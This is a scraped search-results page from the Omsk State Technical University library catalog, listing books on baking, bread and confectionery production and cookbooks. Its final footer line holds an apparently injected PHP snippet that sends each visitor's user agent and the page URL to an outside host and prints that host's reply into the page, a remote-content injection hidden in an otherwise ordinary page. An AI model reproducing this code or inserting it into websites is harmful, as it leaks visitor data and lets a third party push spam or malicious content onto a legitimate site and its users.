Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

238 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ВЫПЕЧКА")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 30
1. 
Пашук З. Н. Мучные кондитерские изделия [Текст] / З. Н. Пашук, Т. К. Апет, 1997. - 459 с.
Ключевые слова 
ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ПРОИЗВОДСТВО КОНДИТЕРСКОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- МУКА -- КРАХМАЛ -- САХАР -- МЕД -- ПАТОКА -- ЯЙЦА -- МОЛОКО -- МАСЛО -- МАРГАРИН -- ЖИР -- ФРУКТЫ -- ЯГОДЫ -- РАЗРЫХЛИТЕЛЬ ТЕСТА -- ДОБАВКА АРОМАТИЧЕСКАЯ -- ДОБАВКА ВКУСОВАЯ -- ОРЕХИ -- МАК -- ПЕЧЕНЬЕ САХАРНОЕ -- ПЕЧЕНЬЕ ЗАТЯЖНОЕ -- ПЕЧЕНЬЕ СДОБНОЕ -- ГАЛЕТЫ -- КРЕКЕР -- ВЫПЕЧКА ПЕЧЕНЬЯ -- ПРЯНИК -- КЕКС -- БАБА РОМОВАЯ -- ТОРТ -- СИРОП -- ПОМАДА -- КАРАМЕЛЬ -- КАНДИР ДЛЯ САХАРНЫХ ФИГУР -- КРЕМ -- МАРЦИПАН -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИТАНИЯ - ТРЕБОВАНИЯ САНИТАРНЫЕ -- ПРАВИЛА ЛИЧНОЙ ГИГИЕНЫ -- СРЕДСТВА МОЮЩИЕ -- СРЕДСТВА ДЕЗИНФИЦИРУЮЩИЕ -- ОСМОТР МЕДИЦИНСКИЙ ЕЖЕСМЕННЫЙ -- ЛАМПА БАКТЕРИЦИДНАЯ
Держатели документа (Информация об экземплярах) 
2. 
Рецепты микроволновой печи. Быстро! Вкусно! Удобно! [Текст] / сост. Г. В. Булгакова, 1996. - 350 с.
Держатели документа (Информация об экземплярах) 
3. 
Машины и аппараты пищевых производств [Текст] : учеб. для вузов по направлению подгот. дипломир. специалистов "Пищевая инженерия": в 3 кн. / под ред. В. А. Панфилова. Кн. 3 / С. Т. Антипов [и др.], 2009. - [543] с.
Держатели документа (Информация об экземплярах) 

В учебнике обобщены сведения о состоянии и перспективе технического обеспечения пищевых и перерабатывающих производств. Особое внимание уделено проблемам, стоящим перед специалистами в деле повышения эффективности машинных технологий продуктов питания. Представлены современные формы организации технологических комплексов, а также машинно-аппаратурные схемы линий для переработки сельхозсырья растительного и животного происхождения, а также морепродуктов в продукты питания. Изложены научные основы реализуемых процессов и инженерные расчеты важнейших характеристик машин и аппаратов. Описано оборудование для ведения механических, гидромеханических, тепломассообменных и биотехнологических процессов, а также для дозирования и упаковывания пищевых продуктов. Рассмотрены методы организации технического обслуживания и ремонта оборудования, приоритетные научные проблемы и инженерные задачи развития пищевых производств, вопросы организации создания новой техники.

4. 
Плаксин, Юрий Михайлович. Процессы и аппараты пищевых производств [Текст] : учеб. для вузов по направлению подгот. бакалавров "Технология продуктов питания" и направлениям подгот. дипломир. специалистов "Производство продуктов питания из растительного сырья", "Технология продовольственных продуктов специального назначения и общественного питания", "Пищевая инженерия" / Ю. М. Плаксин, Н. Н. Малахов, В. А. Ларин, 2008. - 758, [1] с.
Ключевые слова 
УЧЕБНИК И ПОСОБИЕ * -- ГИДРАВЛИКА -- ГИДРОСТАТИКА -- ГИДРОДИНАМИКА -- ИСТЕЧЕНИЕ -- ЖИДКОСТЬ -- ОТВЕРСТИЕ -- НАСАДКА -- ГИДРАВЛИЧЕСКИЙ -- УДАР -- ТРУБОПРОВОД -- АСПИРАЦИЯ -- ПНЕВМОТРАНСПОРТ -- ПОРШНЕВОЙ -- РОТОРНЫЙ -- ПЛУНЖЕРНЫЙ -- НАСОС -- ШЕСТЕРЕННЫЙ -- ПЛАСТИНЧАТЫЙ -- ЦЕНТРОБЕЖНЫЙ -- КОМПРЕССОР -- ВАКУУМНЫЙ -- ГИДРОЦИЛИНДР -- ГИДРОДВИГАТЕЛЬ -- ПЕРЕМЕШИВАНИЕ -- СМЕСИТЕЛЬ -- РАЗДЕЛЕНИЕ -- ОСАЖДЕНИЕ -- ЭЛЕКТРООСАЖДЕНИЕ -- СЕПАРАТОР -- ЦЕНТРИФУГА -- ЦИКЛОН -- ФИЛЬТРОВАНИЕ -- МЕМБРАНА -- ИЗМЕЛЬЧЕНИЕ -- НАГРЕВАНИЕ -- ОХЛАЖДЕНИЕ -- ТЕПЛООБМЕННИК -- ВЫПАРИВАНИЕ -- КОНДЕНСАЦИЯ -- ВЫПЕЧКА -- ХЛЕБ -- УТИЛИЗАЦИЯ -- ТЕПЛОТА -- ХОЛОДИЛЬНАЯ -- ПЕРЕГОНКА -- СУШКА -- ВЕНТИЛИРОВАНИЕ -- ЗЕРНО -- АБСОРБЦИЯ -- АДСОРБЦИЯ -- КРИСТАЛЛИЗАЦИЯ -- РАСТВОРЕНИЕ -- ЭКСТРАГИРОВАНИЕ -- ЭКСТРАКЦИЯ -- ФЕРМЕНТАЦИЯ -- ПАСТЕРИЗАЦИИ -- СТЕРИЛИЗАЦИЯ -- ДЕТОНАЦИЯ -- ПЫЛЬ -- РАСПЫЛИВАНИЕ -- ШЛИФОВАНИЕ -- СЕПАРИРОВАНИЕ
Держатели документа (Информация об экземплярах) 

Изложены методы исследования процессов пищевых производств. Даны необходимые сведения о гидравлических, гидромеханических, тепловых, массообменных, физико-химических и механических процессах. Рассмотрено оборудование, предназначенное для реализации основных процессов пищевых производств. Приведены методы его инженерного расчета.

Во втором издании описаны специальные гидравлические машины пищевых производств, компрессоры, вакуум-насосы, дан материал по холодильным процессам. Каждая глава дополнена четко сформулированными основными положениями, обобщающими изложенный материал, контрольными вопросами и заданиями, а также текстами для проверки знаний.

5. 
Апет Т. К. Хлеб и булочные изделия [Текст] / Т. К. Апет, З. Н. Пашук, 1997. - 319 с.
Ключевые слова 
ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ПРОИЗВОДСТВО ХЛЕБОПЕКАРНОЕ -- МУКА -- ДРОЖЖИ -- СОЛЬ ПОВАРЕННАЯ -- СОЛОД -- САХАР -- МЕД -- ПАТОКА -- МОЛОКО -- ЖИР -- МАСЛО -- ЯЙЦА -- ДОБАВКА АРОМАТИЧЕСКАЯ -- ТЕХНОЛОГИЯ ХЛЕБОПЕЧЕНИЯ -- ЗАМЕС ТЕСТА -- РАЗРЫХЛЕНИЕ ТЕСТА -- БРОЖЕНИЕ ТЕСТА -- ТЕСТО ПШЕНИЧНОЕ -- ТЕСТО РЖАНОЕ -- ПЕЧЬ ХЛЕБОПЕКАРНАЯ -- ХРАНЕНИЕ ХЛЕБА -- ЧЕРСТВЕНИЕ ХЛЕБА -- БОЛЕЗНИ ХЛЕБА -- ДЕФЕКТЫ ХЛЕБА -- ПЕКАРНЯ МАЛАЯ -- СОРТ ХЛЕБА -- ИЗДЕЛИЯ ДИЕТИЧЕСКИЕ -- ИЗДЕЛИЯ СДОБНЫЕ -- ХЛЕБ СДОБНЫЙ -- БУЛКИ СДОБНЫЕ -- ПИРОГ -- КАРАВАЙ -- ЛЕПЕШКА -- ПЛЮШКА -- ВАТРУШКА -- ПИРОЖКИ -- ВЫПЕЧКА ДОМАШНЯЯ
Держатели документа (Информация об экземплярах) 
6. 
Контроль качества сырья, полуфабрикатов и хлебобулочных изделий [Текст] / С. Я. Корячкина [и др.], 2012. - 495 с.
Ключевые слова 
ПРОИЗВОДСТВО ХЛЕБОПЕКАРНОЕ -- ПРЕДПРИЯТИЕ ХЛЕБОПЕКАРНОЕ -- БЕЗОПАСНОСТЬ СЫРЬЯ -- БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ -- ПРИЕМКА СЫРЬЯ -- МУКА -- ДРОЖЖИ -- СОЛЬ ПОВАРЕННАЯ -- ВОДА ПИТЬЕВАЯ -- СОЛОД -- ПРОДУКТЫ САХАРОСОДЕРЖАЩИЕ -- ПРОДУКТЫ МАСЛОЖИРОВЫЕ -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ МОЛОЧНЫЕ -- ПРОДУКТЫ ПЛОДОВО-ЯГОДНЫЕ -- ОРЕХИ -- ПРЯНОСТИ -- КОНТРОЛЬ КАЧЕСТВА СЫРЬЯ -- КОНТРОЛЬ ТЕХНОЛОГИЧЕСКОГО ПРОЦЕССА -- КАЧЕСТВО ПОЛУФАБРИКАТОВ -- БРАКЕРАЖ ХЛЕБОБУЛОЧНЫХ ИЗДЕЛИЙ -- ИЗДЕЛИЯ ХЛЕБОБУЛОЧНЫЕ -- ВЫПЕЧКА ПРОБНАЯ -- АКТ ПРОБНОЙ ВЫПЕЧКИ -- ПОКАЗАТЕЛЬ КАЧЕСТВА ХЛЕБОБУЛОЧНЫХ ИЗДЕЛИЙ -- ЦЕННОСТЬ ПИЩЕВАЯ -- ЭТИКЕТКА -- СРОК ГОДНОСТИ ХЛЕБОБУЛОЧНЫХ ИЗДЕЛИЙ
Держатели документа (Информация об экземплярах) 
7. 
Мармузова, Людмила Викторовна. Технология хлебопекарного производства. Сырье и материалы [Текст] / Л. В. Мармузова ; дар. В. В. Арсеньев, 2008. - 285, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрены виды сырья для производства хлебобулочных изделий, его состав и свойства, технологические процессы и операции на отдельных стадиях изготовления и хранения хлеба, используемое при этом оборудование, в том числе комплексные механизированные линии. Приведены методы оценки качества сырья, полуфабрикатов и готовой продукции, рецептуры и нормы выхода хлебобулочных изделий, условия и сроки их хранения.

Для учащихся образовательных учреждений, учреждений начального профессионального образования. Может быть использован при профессиональном обучении на производстве и в центрах занятости.

8. 
Драгилев, Абрам Иосифович. Технологическое оборудование: хлебопекарное, макаронное и кондитерское [Текст] / А. И. Драгилев, В. М. Хромеенков, М. Е. Чернов ; дар. В. В. Арсеньев, 2006. - 428, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о конструкционных материалах, транспортирующих устройства, общем и специализированном оборудовании для производства хлебных, макаронных и кондитерских изделий.

Для студентов образовательных учреждений среднего профессионального образования.

9. 
Медкова, Ирина Львовна. Сюрпризы вегетарианского стола [Текст] / И. Л. Медкова, Т. Н. Павлова, 1994. - 236, [1] с.
Держатели документа (Информация об экземплярах) 
10. 
Усов В. В. Русская кухня: Блюда из овощей, грибов, молока и яиц, круп и муки. Выпечка [Текст] : учеб. пособие для студентов образоват. учреждений сред. проф. образования / В. В. Усов, 2008. - 415 с.
Держатели документа (Информация об экземплярах) 
11. 
Поскребышева Г. И. Праздничный стол [Текст] : издания для досуга / Г. И. Поскребышева, 2006. - 191 с.
Держатели документа (Информация об экземплярах) 
12. 
Антонова М. А. Русская кухня [Текст] : издания для досуга / М. А. Антонова, С. В. Антонов, 2004. - 222 с.
Держатели документа (Информация об экземплярах) 
13. 
Поскребышева Г. И. Праздничный стол [Текст] : издания для досуга / Г. И. Поскребышева, 2004. - 191 с.
Держатели документа (Информация об экземплярах) 
14. 
Рецептуры для кондитера [Текст] : [Сб.] / Авт.-сост. В. Прохоров, 2003. - 316 с.
Держатели документа (Информация об экземплярах) 
15. 
Обед по-европейски [Текст] : издания для досуга / Сост. Н. Бережных, 2004. - 120 с.
Держатели документа (Информация об экземплярах) 
16. 
Миллион меню современной Европы [Текст] : издания для досуга / Сост. О. Шаллер, 2004. - [600 разрезных + 12] с.
Держатели документа (Информация об экземплярах) 
17. 
Гаевская Л. Я. Украинская кухня [Текст] : издания для досуга / Л. Я. Гаевская, 2004. - 159 с.
Держатели документа (Информация об экземплярах) 
18. 
Миллион меню. Любимые блюда Востока [Текст] : издания для досуга / Сост. И. А. Кириллова, 2003. - [600 разрезных + 20] с.
Держатели документа (Информация об экземплярах) 
19. 
Миллион меню. Волшебство мировой кулинарии [Текст] : издания для досуга / Сост. И. Ройтенберг, 2003. - [600 разрезных + 20] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
20. 
Стойкова Л. В. Выпечка хлеба. Пасхальные куличи и все из муки [Текст] / Л. В. Стойкова, 1999. - 315 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2931 - 19.06.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.84 с.12 запросов, 0.45c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;